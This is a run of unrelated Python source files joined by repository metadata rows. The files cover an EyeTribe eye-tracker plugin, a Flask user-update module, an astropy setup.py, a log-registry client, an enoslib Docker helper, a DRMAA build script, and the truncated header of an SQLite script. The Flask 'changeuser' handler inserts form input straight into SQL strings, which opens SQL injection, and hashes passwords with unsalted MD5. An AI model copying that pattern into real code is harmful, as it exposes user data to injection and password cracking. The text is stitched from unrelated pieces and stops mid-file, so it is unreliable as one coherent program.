"""Start push mode."""
self.sockthread.send(json.dumps(self._gen_set_push_msg(True)))
def _stop_push(self):
"""Stop push mode."""
# TODO: EyeTribe server does not stop sending data after stop push
# request.
self.sockthread.send(json.dumps(self._gen_set_push_msg(False)))
def start(self):
"""Start the Eye Tribe."""
self._init_socket()
# First request all relevant values from eyetribe server
self.sockthread.send(json.dumps(self._gen_get_values_msg(
self.get_value_keywords)))
# Then start push mode
self._start_push()
def stop(self):
"""Stop the Eye Tribe."""
self._stop_push()
self.sockthread.stop()
del self.sockthread
self.sockthread = None
class EyeTribeET(Sensor):
"""Plugin class for drop."""
def __init__(self, rootdir, savedir, on_created, on_error):
"""Constructor."""
# run the superclass constructor
super(EyeTribeET, self).__init__()
self.type = 'Eyetracker'
self.control_elements = []
self.device_id = "Eyetribe eyetracker"
self.on_created = on_created
self.on_error = on_error
self.tracker = EyeTribe("localhost", 6555, self._handle_frame_callback)
self.tracker.start()
# nudged calibration values
self.nudged_current_range = None
self.nudged_domain_r = []
self.nudged_domain_l = []
self.nudged_range = []
self.nudged_transform_r = nudged.Transform(1, 0, 0, 0)
self.nudged_transform_l = nudged.Transform(1, 0, 0, 0)
self.collect_data = False
glib.idle_add(self.on_created, self)
def _handle_frame_callback(self, frame):
glib.idle_add(self._handle_gazedata_frame, frame)
def _inside_aoi(self, x, y, aoi):
return aoi[0] < x and x < aoi[1] and aoi[2] < y and y < aoi[3]
def _data_condition_check(self, rx, ry, lx, ly):
# TODO: Move this function to superclass
"""
Data condition check.
Returns True if the condition met, False if not.
"""
for cond in self.data_conditions:
if cond["type"] == "aoi":
if cond["inorout"] == "in" and \
(self._inside_aoi(rx, ry, cond["aoi"]) or
self._inside_aoi(lx, ly, cond["aoi"])):
self.data_conditions = []
return True
return False
def _handle_gazedata_frame(self, frame):
# TODO: Create a superclass version of this
# Parsing
screen_w = self.tracker.values['screenresw']
screen_h = self.tracker.values['screenresh']
gaze_left_x = frame['lefteye']['raw']['x'] / screen_w
gaze_left_y = frame['lefteye']['raw']['y'] / screen_h
gaze_right_x = frame['righteye']['raw']['x'] / screen_w
gaze_right_y = frame['righteye']['raw']['y'] / screen_h
# Put normalized coordinates back into frame
frame['lefteye']['raw']['x'] = gaze_left_x
        frame['lefteye']['raw']['y'] = gaze_left_y
frame['righteye']['raw']['x'] = gaze_right_x
frame['righteye']['raw']['y'] = gaze_right_y
# TODO: Do normalization and transforms for avg coordinates as well
# Nudged transform
gaze_left_nx, gaze_left_ny = \
self.nudged_transform_l.transform([gaze_left_x, gaze_left_y])
gaze_right_nx, gaze_right_ny = \
self.nudged_transform_r.transform([gaze_right_x, gaze_right_y])
# Write data to file if recording has started
frame.update({
            'lefteye_nudged': {'raw': {'x': gaze_left_nx, 'y': gaze_left_ny}},
            'righteye_nudged': {'raw': {'x': gaze_right_nx, 'y': gaze_right_ny}}
})
if self.collect_data:
self.collect_file.write(json.dumps({'frame': frame}) + '\n')
# Calibration & linear transformation section
if self.nudged_current_range is not None:
# If tracking both gaze and eyes (as a validity check)
if frame['state'] & 0x3 != 0:
self.nudged_range.append(self.nudged_current_range)
self.nudged_domain_l.append([gaze_left_x, gaze_left_y])
self.nudged_domain_r.append([gaze_right_x, gaze_right_y])
# Data condition check
dc_nudged = self._data_condition_check(gaze_right_nx,
gaze_right_ny,
gaze_left_nx,
gaze_left_ny)
dc_uncalibrated = self._data_condition_check(gaze_right_x,
gaze_right_y,
gaze_left_x,
gaze_left_y)
if dc_nudged or dc_uncalibrated:
self.emit("draw_que_updated")
self.emit("data_condition_met")
# Draw eyes and gaze positions
for eye in ['left', 'right']:
self.draw_eye(eye, frame[eye + 'eye'], 1.0)
self.draw_gaze('left', gaze_left_x, gaze_left_y, 1.0)
self.draw_gaze('right', gaze_right_x, gaze_right_y, 1.0)
self.draw_gaze('leftN', gaze_left_nx, gaze_left_ny, 1.0,
{'r': 1, 'g': 1, 'b': 1})
self.draw_gaze('rightN', gaze_right_nx, gaze_right_ny, 1.0,
{'r': 1, 'g': 1, 'b': 1})
def trial_started(self, tn, tc):
"""Called when trial has started."""
return False
def trial_completed(self, name, tn, tc, misc):
"""Called when trial has completed."""
return False
def tag(self, tag):
"""Called when tag needs to be inserted into data."""
if self.collect_data:
self.collect_file.write(json.dumps({'tag': tag}) + '\n')
# check if validity is to be calculated
if tag["secondary_id"] == "start":
# go to nudged calibration mode
if "nudged_point" in tag:
# Nudged point format: "1.0, 0.5"
[x, y] = tag["nudged_point"].split(",")
xf = float(x)
yf = float(y)
self.nudged_current_range = [xf, yf]
# check if previous occurrances of this point exist
while [xf, yf] in self.nudged_range:
# find the index of the element in range
ind = self.nudged_range.index([xf, yf])
# remove the index from range and domains
self.nudged_range.pop(ind)
self.nudged_domain_l.pop(ind)
self.nudged_domain_r.pop(ind)
elif tag["secondary_id"] == "end":
if "nudged_point" in tag:
self.nudged_current_range = None
# calculate nudged transform
print "Calculating nudged calibration for right eye with " + \
"vectors: dom[" + str(len(self.nudged_domain_r)) + \
"] and range[" + str(len(self.nudged_range))
self.nudged_transform_r = nudged.estimate(self.nudged_domain_r,
self.nudged_range)
print "Calculating new calibration..."
self.nudged_transform_l = nudged.estimate(self.nudged_domain_l,
self.nudged_range)
return False
def action(self, action_id):
"""Perform actions for the control elements defined."""
print "ET: ACTION"
return False
def get_type(self):
"""Get 'type' of eye tracker."""
return self.type
def add_data_condition(self, condition):
"""Add data condition."""
print "ET: ADD DATA CONDITION"
return False
def get_device_id(self):
"""Get id of the device."""
return self.device_id
def get_control_elements(self):
"""Get control elements."""
return self.control_elements
def stop_recording(self):
"""Called when recording should be stopped."""
if self.collect_data:
self.collect_data = False
self.collect_file.close()
_convert_json_to_tabdelim(self.collect_filename + '.json',
self.collect_filename)
def start_recording(self, rootdir, participant_id, experiment_file,
section_id):
"""Called when recording should be started."""
assert not self.collect_data
expname = os.path.basename(experiment_file).split('.')[0]
fname = '%s_%s_%s.gazedata' % (expname,
participant_id,
section_id)
fname = os.path.join(rootdir, fname)
json_fname = fname + '.json'
self.collect_file = open(json_fname, 'w')
self.collect_filename = fname
metadata = json.dumps({'metadata': self.tracker.values})
self.collect_file.write(metadata + '\n')
self.collect_data = True
def disconnect(self):
"""Called when disconnect has been requested from GUI."""
self.tracker.stop()
self.emit("clear_screen")
self.remove_all_listeners()
return False
def draw_gaze(self, eye, gazepos_x, gazepos_y, opacity,
color={'r': 0, 'g': 0, 'b': 1}):
"""Draw one gazepoint."""
radius = 0.02
self.emit("add_draw_que",
eye,
{"type": "circle",
"r": color['r'],
"g": color['g'],
"b": color['b'],
"o": opacity,
"x": gazepos_x,
"y": gazepos_y,
"radius": radius})
def draw_eye(self, eye, frame_eye, opacity):
"""Draw one eye."""
camera_pos_x = 1.0 - frame_eye['pcenter']['x']
camera_pos_y = frame_eye['pcenter']['y']
screen_w = self.tracker.values['screenresw']
screen_h = self.tracker.values['screenresh']
gazepos_x = frame_eye['raw']['x'] / screen_w
gazepos_y = frame_eye['raw']['y'] / screen_h
point_x = gazepos_x - .5
point_y = gazepos_y - .5
ball_radius = 0.075
iris_radius = 0.03
pupil_radius = 0.01
x = 1 - camera_pos_x
y = camera_pos_y
self.emit("add_draw_que", eye + "ball",
{"type": "circle", "r": 1, "g": 1, "b": 1,
"o": opacity, "x": x, "y": y, "radius": ball_radius})
x = 1 - camera_pos_x + ((ball_radius - iris_radius / 2) * point_x)
y = camera_pos_y + ((ball_radius - iris_radius / 2) * point_y)
self.emit("add_draw_que", eye + "iris",
{"type": "circle", "r": 0.5, "g": 0.5, "b": 1,
"o": opacity, "x": x, "y": y, "radius": iris_radius})
self.emit("add_draw_que", eye + "pupil",
{"type": "circle", "r": 0, "g": 0, "b": 0,
"o": opacity, "x": x, "y": y, "radius": pupil_radius})
def __del__(self):
"""Destructor."""
print self.device_id + " disconnected."
| mit | 9,056,282,555,783,877,000 | 33.18543 | 79 | 0.531916 | false |
MissRoven/python | demo/app/mangeruser.py | 1 | 1063 | from . import app
import json
from flask import request,render_template,redirect,make_response,session
@app.route('/upuser')
def adduser():
return render_template('up.html',username=session['username'])
@app.route('/changeuser',methods=['POST'])
def changeuser():
change = request.form.get('change')
    username = request.form.get('username')
if "show" == change:
sql = 'select * from user where username = "%s"'%(username)
tmp = app.config['cursor']._execute(sql)
cur=tmp['cur'].fetchall()
return json.dumps(cur)
elif "update" == change:
        password = request.form.get('password')
        email = request.form.get('email')
        age = request.form.get('age')
        sex = request.form.get('sex')
        address = request.form.get('address')
sql = 'update user set password=md5("%s"),email="%s",age="%s",sex="%s",address="%s" where username="%s" '%(password,email,age,sex,address,username)
print sql
tmp = app.config['cursor']._execute(sql)
cur=tmp['msg']
return cur
| gpl-2.0 | -9,161,075,792,723,971,000 | 36.964286 | 155 | 0.621825 | false |
crawfordsm/indlulamithi | setup.py | 1 | 3745 | #!/usr/bin/env python
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import glob
import os
import sys
import ah_bootstrap
from setuptools import setup
#A dirty hack to get around some early import/configurations ambiguities
if sys.version_info[0] >= 3:
import builtins
else:
import __builtin__ as builtins
builtins._ASTROPY_SETUP_ = True
from astropy_helpers.setup_helpers import (
register_commands, adjust_compiler, get_debug_option, get_package_info)
from astropy_helpers.git_helpers import get_git_devstr
from astropy_helpers.version_helpers import generate_version_py
# Get some values from the setup.cfg
from distutils import config
conf = config.ConfigParser()
conf.read(['setup.cfg'])
metadata = dict(conf.items('metadata'))
PACKAGENAME = metadata.get('package_name', 'packagename')
DESCRIPTION = metadata.get('description', 'Astropy affiliated package')
AUTHOR = metadata.get('author', '')
AUTHOR_EMAIL = metadata.get('author_email', '')
LICENSE = metadata.get('license', 'unknown')
URL = metadata.get('url', 'http://astropy.org')
# Get the long description from the package's docstring
__import__(PACKAGENAME)
package = sys.modules[PACKAGENAME]
LONG_DESCRIPTION = package.__doc__
# Store the package name in a built-in variable so it's easy
# to get from other parts of the setup infrastructure
builtins._ASTROPY_PACKAGE_NAME_ = PACKAGENAME
# VERSION should be PEP386 compatible (http://www.python.org/dev/peps/pep-0386)
VERSION = '0.1.dev'
# Indicates if this version is a release version
RELEASE = 'dev' not in VERSION
if not RELEASE:
VERSION += get_git_devstr(False)
# Populate the dict of setup command overrides; this should be done before
# invoking any other functionality from distutils since it can potentially
# modify distutils' behavior.
cmdclassd = register_commands(PACKAGENAME, VERSION, RELEASE)
# Adjust the compiler in case the default on this platform is to use a
# broken one.
adjust_compiler(PACKAGENAME)
# Freeze build information in version.py
generate_version_py(PACKAGENAME, VERSION, RELEASE,
get_debug_option(PACKAGENAME))
# Treat everything in scripts except README.rst as a script to be installed
scripts = [fname for fname in glob.glob(os.path.join('scripts', '*'))
if os.path.basename(fname) != 'README.rst']
# Get configuration information from all of the various subpackages.
# See the docstring for setup_helpers.update_package_files for more
# details.
package_info = get_package_info()
# Add the project-global data
package_info['package_data'].setdefault(PACKAGENAME, [])
package_info['package_data'][PACKAGENAME].append('data/*')
# Define entry points for command-line scripts
entry_points = {}
entry_points['console_scripts'] = [
'astropy-package-template-example = packagename.example_mod:main',
]
# Include all .c files, recursively, including those generated by
# Cython, since we can not do this in MANIFEST.in with a "dynamic"
# directory name.
c_files = []
for root, dirs, files in os.walk(PACKAGENAME):
for filename in files:
if filename.endswith('.c'):
c_files.append(
os.path.join(
os.path.relpath(root, PACKAGENAME), filename))
package_info['package_data'][PACKAGENAME].extend(c_files)
setup(name=PACKAGENAME,
version=VERSION,
description=DESCRIPTION,
scripts=scripts,
requires=['astropy'],
install_requires=['astropy'],
provides=[PACKAGENAME],
author=AUTHOR,
author_email=AUTHOR_EMAIL,
license=LICENSE,
url=URL,
long_description=LONG_DESCRIPTION,
cmdclass=cmdclassd,
zip_safe=False,
use_2to3=True,
entry_points=entry_points,
**package_info
)
| bsd-3-clause | 1,335,141,643,837,184,800 | 31.284483 | 79 | 0.722296 | false |
nfqsolutions/pylm-registry | pylm/registry/clients/logs.py | 1 | 1616 | import json
from urllib import parse
from tornado.httpclient import HTTPClient
class LogClient(object):
"""
Client to send and retrieve logs
"""
def __init__(self, uri, cluster):
self.uri = uri
self.cluster = cluster
def send(self, text):
"""
Send a log line to the registry
:param text: Text of the log line
"""
arguments = {
'cluster': self.cluster,
}
client = HTTPClient()
client.fetch('{}/logs?{}'.format(
self.uri, parse.urlencode(arguments)),
method='POST',
body=text
)
def download(self, fr=None, to=None):
"""
        Download the log lines, which you may filter by time
:param fr: datetime. Log lines from
:param to: datetime. Log lines to
:return: A list with dicts
"""
arguments = {
'cluster': self.cluster
}
if fr:
arguments['fr'] = fr
if to:
arguments['to'] = to
client = HTTPClient()
response = client.fetch('{}/logs?{}'.format(
self.uri, parse.urlencode(arguments)),
)
return json.loads(response.body.decode('utf-8'))
def view(self, fr=None, to=None):
"""
Pretty print the log lines
:param fr: datetime. Log lines from
:param to: datetime. Log lines to
:return:
"""
for log_line in self.download(fr, to):
print(log_line['when'], log_line['text'])
def delete(self):
raise NotImplementedError() | agpl-3.0 | 1,886,138,002,118,353,000 | 22.779412 | 59 | 0.525371 | false |
BeyondTheClouds/enoslib | enoslib/docker.py | 1 | 5041 | """Manage remote docker containers as first class citizens.
A possible workflow would be to start your containers using the method of
your choice and build the list of available dockers using the
:py:func:`enoslib.docker.get_dockers` function.
A ``DockerHost`` is a specialization of a ``Host`` and thus can be fed into
any Host related operations (play_on, run_command...) [#docker0]_. The Host
datastructure in enoslib is somewhat tied to Ansible. DockerHost is shaped so
that the docker connection plugin can run. So we inject at build time the
necessary connection options (``ansible_connection=docker``,
``ansible_docker_extra_args="-H <remote_docker>"``).
Connections to remote docker daemons can be made using different
protocols [#docker1]_.
- Using ssh: requires ssh access to remote host but
can go through a bastion host if .ssh/config is configured correctly.
Note that the docker client must be available.
- Using raw tcp: requires being able to reach the remote docker daemon (e.g. be inside
g5k). Note that in this case the remote socket must be exposed.
Additionally the structure is compatible with mitogen and its delegation model
[#docker2]_, which can improve performance. Note that the facts from the
host machines (where the docker daemon runs) need to be gathered. One way to
ensure this is to explicitly gather the facts from such hosts.
.. topic:: Links
.. [#docker0] https://en.wikipedia.org/wiki/Liskov_substitution_principle
.. [#docker1] https://docs.docker.com/engine/reference/commandline/dockerd
.. [#docker2] https://mitogen.networkgenomics.com/ansible_detailed.html
Example:
.. literalinclude:: examples/advanced_docker.py
:language: python
:linenos:
"""
import json
from typing import List, Mapping, Optional
from enoslib.api import run_command, get_hosts
from enoslib.objects import Host, Roles
class DockerHost(Host):
"""A kind of host reachable using docker protocol.
Args:
        alias: **unique** name across the deployment
        container_name: name of the docker container on the remote host
host : the host where the container can be found
proto: how to connect to the remote host
(DockerHost.PROTO_TCP/DockerHost.PROTO_SSH)
[Default DockerHost.PROTO_SSH]
state: dict representing the state as returned by ``docker inspect``
"""
PROTO_SSH = "ssh"
PROTO_TCP = "tcp"
def __init__(
self,
alias: str,
container_name: str,
host: Host,
proto: Optional[str] = None,
state: Optional[Mapping] = None,
):
self.remote = host.address
if proto is None:
proto = self.PROTO_SSH
self.proto = proto
if self.proto not in [self.PROTO_SSH, self.PROTO_TCP]:
raise ValueError(f"proto must be in {[self.PROTO_SSH, self.PROTO_TCP]}")
if host.user:
self.remote = f"{host.user}@{host.address}"
else:
self.remote = f"{host.address}"
# Optionaly keep the internal state (return by docker inspect)
# Note that currently we don't provide, any consistency guarantee.
self._state = {} if state is None else state
super().__init__(
container_name,
alias=alias,
user=host.user,
keyfile=host.keyfile,
extra=dict(
ansible_connection="docker",
ansible_docker_extra_args=f"-H {proto}://{self.remote}",
mitogen_via=f"{host.user}@{host.address}",
),
)
@classmethod
def from_state(cls, state: Mapping, host: Host):
"""Build a DockerHost from a state json as returned by docker inspect."""
container_name = state["Name"]
alias = f"{container_name}-{host.alias}"
return cls(alias, container_name, host, state=state)
def get_dockers(
roles: Roles, pattern_hosts: str = "*", container_name: str = ".*"
) -> List[DockerHost]:
"""Get remote dockers hosts.
Args:
roles: the roles as returned by
:py:meth:`enoslib.infra.provider.Provider.init`
pattern_hosts: pattern to describe ansible hosts to target.
see https://docs.ansible.com/ansible/latest/intro_patterns.html
        container_name: name of the containers to look for. Regexps are
            supported as in the filter option of docker inspect.
Returns:
List of DockerHost matching the passed container_name
"""
docker_hosts = []
result = run_command(
f"docker ps -q --filter name={container_name} | xargs docker inspect",
pattern_hosts=pattern_hosts,
roles=roles,
on_error_continue=True,
)
# parsing the results
for alias, r in result["ok"].items():
dockers = json.loads(r["stdout"])
host = get_hosts(roles, alias)[0]
for docker in dockers:
docker_host = DockerHost.from_state(docker, host)
docker_hosts.append(docker_host)
return docker_hosts | gpl-3.0 | -5,821,203,870,560,577,000 | 36.073529 | 84 | 0.652252 | false |
mikel-egana-aranguren/SADI-Galaxy-Docker | galaxy-dist/scripts/scramble/scripts/DRMAA_python-macosx.py | 1 | 1552 | import os, sys, shutil
if "SGE_ROOT" not in os.environ:
print "main(): Please set SGE_ROOT to the path of your SGE installation"
print "main(): before scrambling DRMAA_python"
sys.exit(1)
# change back to the build dir
if os.path.dirname( sys.argv[0] ) != "":
os.chdir( os.path.dirname( sys.argv[0] ) )
# find setuptools
sys.path.append( os.path.join( '..', '..', '..', 'lib' ) )
from scramble_lib import *
tag = get_tag() # get the tag
clean() # clean up any existing stuff (could happen if you run scramble.py by hand)
# patch
file = "setup.py"
print "main(): Patching", file
if not os.access( "%s.orig" %file, os.F_OK ):
shutil.copyfile( file, "%s.orig" %file )
i = open( "%s.orig" %file, "r" )
o = open( file, "w" )
for line in i.readlines():
if line == 'SGE6_ROOT="/scratch_test02/SGE6"\n':
line = 'SGE6_ROOT="%s"\n' % os.environ["SGE_ROOT"]
if line.startswith('link_args ='):
line = 'link_args = [ "-L%s" % os.path.join(SGE6_ROOT, "lib", SGE6_ARCH), "-ldrmaa" ]\n'
print >>o, line,
i.close()
o.close()
# build
me = sys.argv[0]
sys.argv = [ me ]
sys.argv.append( "build" )
execfile( "setup.py", globals(), locals() )
# fix _cDRMAA.so rpath
so = "build/lib.%s-%s/_cDRMAA.so" % ( pkg_resources.get_platform(), sys.version[:3] )
libdrmaa = os.path.join(SGE6_ROOT, "lib", SGE6_ARCH, "libdrmaa.dylib.1.0" )
os.system( "install_name_tool -change libdrmaa.dylib.1.0 %s %s" % ( libdrmaa, so ) )
# package
sys.argv = [ me ]
sys.argv.append( "bdist_egg" )
execfile( "setup.py", globals(), locals() )
| gpl-3.0 | -6,921,328,556,642,751,000 | 30.673469 | 97 | 0.619201 | false |
demarlik01/szcal | app.py | 1 | 1040 | from flask import Flask
from flask import request
from flask import jsonify
from flask import Response
from flask_cors import CORS
from database import session
from models import Address
from urllib import parse
from utils import replace_if_short_address
app = Flask(__name__)
CORS(app)
@app.route('/cj/secluded_place')
def cj_secluded_place():
address_args = request.args.get('address')
if address_args:
trimmed_address = parse.unquote(address_args).replace(' ', '')
address = replace_if_short_address(trimmed_address)
result = session.query(Address).filter(Address.trimmed_address == address).first()
if result is not None:
result_dict = {
'zipcode': result.zipcode,
'address': result.address,
'additional_fee': result.add_fee,
}
return jsonify(result_dict)
else:
return Response(status=404)
else:
return Response(status=400)
if __name__ == '__main__':
app.run(debug=True)
| mit | -1,199,521,550,846,967,300 | 27.888889 | 90 | 0.638462 | false |
vejmelkam/wrfxpy | tests/l0_retr_test.py | 1 | 1892 | #
# Dalton Burke
#
# Test correct functionality of the retrieval of level0 files
import os
import subprocess
import datetime
import shutil
# Set root directory of wrfxpy as working directory
script_path = os.path.realpath(__file__)
# + 6 gets us to wrfxpy
index = script_path.find('wrfxpy/tests') + 6
os.chdir(script_path[:index])
# Path where the download files should go
local_path = 'tests/l0_test_ingest'
# Remove data from old tests
shutil.rmtree(local_path, ignore_errors=True)
current_time = datetime.datetime.utcnow()
ten_hours_ago = str(current_time - datetime.timedelta(hours=10)).replace(' ', '_')
five_hours_ago = str(current_time - datetime.timedelta(hours=5)).replace(' ', '_')
current_time = str(current_time).replace(' ', '_')
source_types = ['MODIS_AQUA', 'MODIS_TERRA', 'VIIRS_NPP']
# -----------------------------------------------------------------------
# Download all data sources from the last 5 hours
print "TESTING SOURCES FOR FILES IN LAST 5 HOURS\n"
for t in source_types:
print "\nRETRIEVING %s FILES FROM THE LAST 5 HOURS WITH CALL:" % t
print './level0_retr.sh %s %s %s %s \n' % (t, five_hours_ago, current_time, local_path)
subprocess.call(['./level0_retr.sh', t, five_hours_ago, current_time, local_path])
print "\nDONE RETRIEVING FILES FROM LAST 5 HOURS \n\n"
# -----------------------------------------------------------------------
# Download all data sources from the last 10 hours
# (some data we should already have, so those should be skipped)
print "TESTING SOURCES FOR FILES IN LAST 10 HOURS\n"
for t in source_types:
print "\nRETRIEVING %s FILES FROM THE LAST 10 HOURS WITH CALL:" % t
print './level0_retr.sh %s %s %s %s \n' % (t, ten_hours_ago, current_time, local_path)
subprocess.call(['./level0_retr.sh', t, ten_hours_ago, current_time, local_path])
print "\nDONE RETRIEVING FILES FROM LAST 10 HOURS"
| mit | -768,657,775,686,732,700 | 30.533333 | 91 | 0.650106 | false |
project-rig/rig | tests/test_type_casts.py | 1 | 8696 | import numpy as np
import pytest
from rig.type_casts import (
float_to_fix, fix_to_float,
float_to_fp, fp_to_float,
NumpyFloatToFixConverter, NumpyFixToFloatConverter
)
import struct
sz = {
8: 'b',
16: 'h',
32: 'i',
}
SZ = {k: v.upper() for k, v in sz.items()}
class TestFloatToFix(object):
"""Test converting from a float to a fixed point.
"""
@pytest.mark.parametrize(
"signed, n_bits, n_frac",
[(True, 32, 32), # Too many frac bits
(False, 32, 33),
(False, -1, 3),
(False, 32, -1), # Negative
])
def test_invalid_parameters(self, signed, n_bits, n_frac):
with pytest.raises(ValueError):
float_to_fix(signed, n_bits, n_frac)
@pytest.mark.parametrize(
"value, n_bits, n_frac, output",
[(0.50, 8, 4, 0x08),
(0.50, 8, 5, 0x10),
(0.50, 8, 6, 0x20),
(0.50, 8, 7, 0x40),
(0.50, 8, 8, 0x80),
(0.25, 8, 4, 0x04),
(0.75, 8, 4, 0x0c),
(1.75, 8, 4, 0x1c),
(-1.75, 8, 4, 0x00), # Clipped
])
def test_no_saturate_unsigned(self, value, n_bits, n_frac, output):
assert float_to_fix(False, n_bits, n_frac)(value) == output
assert float_to_fp(False, n_bits, n_frac)(value) == output
@pytest.mark.parametrize(
"v, n_bits, n_frac, output",
[(0.50, 8, 4, 0x08),
(0.50, 8, 5, 0x10),
(0.50, 8, 6, 0x20),
(0.50, 8, 7, 0x40),
(0.25, 8, 4, 0x04),
(0.75, 8, 4, 0x0c),
(-.50, 8, 4, 0xf8),
(-.50, 8, 5, 0xf0),
(-.50, 8, 6, 0xe0),
(-.50, 8, 7, 0xc0),
(-.25, 8, 4, 0xfc),
(-.75, 8, 4, 0xf4),
(-.25, 8, 1, 0x00),
(1.75, 8, 4, 0x1c),
(-1.75, 8, 4, 0xe4),
(-2.75, 8, 4, 0xd4),
(-1.0, 8, 4, 0xf0),
(-7.9375, 8, 4, 0x81),
(-8, 8, 4, 0x80),
(-16, 8, 4, 0x80),
(-1.0, 8, 3, 0xf8),
(-1.0, 8, 2, 0xfc),
(-1.0, 8, 1, 0xfe),
(-1.0, 16, 1, 0xfffe),
(-1.0, 16, 2, 0xfffc),
])
def test_no_saturate_signed(self, v, n_bits, n_frac, output):
assert float_to_fix(True, n_bits, n_frac)(v) == output
assert (
struct.pack(sz[n_bits], float_to_fp(True, n_bits, n_frac)(v)) ==
struct.pack(SZ[n_bits], output)
)
@pytest.mark.parametrize(
"value, n_bits, n_frac, output",
[(2**4, 8, 4, 0xff), # Saturate
(2**4 - 1 + sum(2**-n for n in range(1, 6)), 8, 4, 0xff), # Saturate
])
def test_saturate_unsigned(self, value, n_bits, n_frac, output):
assert float_to_fix(False, n_bits, n_frac)(value) == output
assert float_to_fp(False, n_bits, n_frac)(value) == output
class TestFloatToFp(object):
@pytest.mark.parametrize(
"signed, n_bits, n_frac, value, output",
((True, 8, -2, 0.25, 0x0),
(True, 8, -2, 4, 0x1),
(True, 8, -2, -4, -0x1),
(False, 8, -2, -4, 0x0),
)
)
def test_negative_nfrac(self, signed, n_bits, n_frac, value, output):
assert float_to_fp(signed, n_bits, n_frac)(value) == output
@pytest.mark.parametrize(
"signed, n_bits, n_frac, value, output",
((True, 8, 8, -0.5, -0x80),
(False, 8, 8, 0.5, 0x80),
(False, 8, 9, 0.5, 0xff),
(False, 8, 9, 0.25, 0x80),
)
)
def test_large_nfrac(self, signed, n_bits, n_frac, value, output):
assert float_to_fp(signed, n_bits, n_frac)(value) == output
class TestFixToFloat(object):
@pytest.mark.parametrize(
"signed, n_bits, n_frac",
[(True, 32, 32), # Too many frac bits
(False, 32, 33),
(False, -1, 3),
(False, 32, -1), # Negative
])
def test_invalid_parameters(self, signed, n_bits, n_frac):
with pytest.raises(ValueError):
fix_to_float(signed, n_bits, n_frac)
@pytest.mark.parametrize(
"bits, signed, n_bits, n_frac, value",
[(0xff, False, 8, 0, 255.0),
(0x81, True, 8, 0, -127.0),
(0xff, False, 8, 1, 127.5),
(0xf8, True, 8, 4, -0.5)
])
def test_fix_to_float(self, bits, signed, n_bits, n_frac, value):
assert value == fix_to_float(signed, n_bits, n_frac)(bits)
@pytest.mark.parametrize(
"bits, n_frac, value",
[(0xff, 0, 255.0),
(-0x7f, 0, -127.0),
(0xff, 1, 127.5),
(-0x08, 4, -0.5)
])
    def test_fp_to_float(self, bits, n_frac, value):
assert value == fp_to_float(n_frac)(bits)
class TestNumpyFloatToFixConverter(object):
def test_init_fails(self):
with pytest.raises(ValueError):
NumpyFloatToFixConverter(False, 31, 0)
@pytest.mark.parametrize(
"signed, n_bits, dtype, n_bytes",
[(False, 8, np.uint8, 1),
(True, 8, np.int8, 1),
(False, 16, np.uint16, 2),
(True, 16, np.int16, 2),
(False, 32, np.uint32, 4),
(True, 32, np.int32, 4),
(False, 64, np.uint64, 8),
(True, 64, np.int64, 8),
])
def test_dtypes(self, signed, n_bits, dtype, n_bytes):
"""Check that the correcy dtype is returned."""
fpf = NumpyFloatToFixConverter(signed, n_bits, 0)
assert fpf.dtype == dtype
assert fpf.bytes_per_element == n_bytes
@pytest.mark.parametrize(
"n_bits, n_frac, values, dtype",
[(8, 4, [0.5, 0.25, 0.125, 0.0625], np.uint8),
(8, 3, [0.5, 0.25, 0.125, 0.0625], np.uint8),
(8, 2, [0.5, 0.25, 0.125, 0.0625], np.uint8),
(8, 1, [0.5, 0.25, 0.125, 0.0625], np.uint8),
(8, 0, [0.5, 0.25, 0.125, 0.0625], np.uint8),
(8, 8, [0.5, 0.25, 0.125, 0.0625], np.uint8),
(8, 9, [0.5, 0.25, 0.125, 0.0625], np.uint8),
(16, 12, [0.5, 0.25, 0.125, 0.0625], np.uint16),
(32, 15, [0.5, 0.25, 0.125, 0.0625], np.uint32),
])
def test_unsigned_no_saturate(self, n_bits, n_frac, values, dtype):
# Create the formatter then call it on the array
fpf = NumpyFloatToFixConverter(False, n_bits, n_frac)
vals = fpf(np.array(values))
# Check the values are correct
ftf = float_to_fp(False, n_bits, n_frac)
assert np.all(vals == np.array([ftf(v) for v in values]))
assert vals.dtype == dtype
@pytest.mark.parametrize(
"n_bits, n_frac, values, dtype",
[(8, 4, [0.5, 0.25, 0.125, 0.0625, -0.5], np.int8),
(8, 3, [0.5, 0.25, 0.125, 0.0625, -0.25], np.int8),
(8, 2, [0.5, 0.25, 0.125, 0.0625, -0.33], np.int8),
(8, 1, [0.5, 0.25, 0.125, 0.0625, -0.25], np.int8),
(8, 0, [0.5, 0.25, 0.125, 0.0625, -0.23], np.int8),
(8, 9, [0.5, 0.25, 0.125, 0.0625, -0.23], np.int8),
(16, 12, [0.5, 0.25, 0.125, 0.0625, -0.45], np.int16),
(32, 15, [0.5, 0.25, 0.125, 0.0625, -0.77], np.int32),
])
def test_signed_no_saturate(self, n_bits, n_frac, values, dtype):
# Create the formatter then call it on the array
fpf = NumpyFloatToFixConverter(True, n_bits, n_frac)
vals = fpf(np.array(values))
# Check the values are correct
ftf = float_to_fp(True, n_bits, n_frac)
assert np.all(vals == np.array([ftf(v) for v in values]))
assert vals.dtype == dtype
@pytest.mark.parametrize("signed", [True, False])
@pytest.mark.parametrize(
"n_bits, n_frac",
[(8, 0), (8, 4), (16, 5), (32, 27)])
def test_saturate(self, signed, n_bits, n_frac):
# Build the values
values = [2.0**(n_bits - n_frac - (1 if signed else 0)),
2.0**(n_bits - n_frac - (1 if signed else 0)) - 1]
# Format
fpf = NumpyFloatToFixConverter(signed, n_bits, n_frac)
vals = fpf(np.array(values))
c = {8: 'B', 16: 'H', 32: 'I'}[n_bits]
# Check the values are correct
ftf = float_to_fix(signed, n_bits, n_frac)
assert ( # pragma: no branch
bytes(vals.data) ==
struct.pack("{}{}".format(len(values), c),
*[ftf(v) for v in values])
)
class TestNumpyFixToFloat(object):
@pytest.mark.parametrize(
"values, dtype, n_frac, expected_values",
[([0xff], np.uint8, 4, np.array([15.9375])),
([0xf8], np.int8, 4, np.array([-.5])),
]
)
def test_standard(self, values, dtype, n_frac, expected_values):
input_array = np.array(values, dtype=dtype)
fpf = NumpyFixToFloatConverter(n_frac)
output_array = fpf(input_array)
assert np.all(output_array == expected_values)
| gpl-2.0 | -4,021,734,756,975,590,000 | 33.371542 | 78 | 0.50598 | false |
annahs/atmos_research | LEO_2D_histos_from_db.py | 1 | 3992 | import sys
import os
import datetime
import pickle
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib.colors as colors
from pprint import pprint
import sqlite3
import calendar
from datetime import datetime
#id INTEGER PRIMARY KEY AUTOINCREMENT,
#sp2b_file TEXT,
#file_index INT,
#instr TEXT,
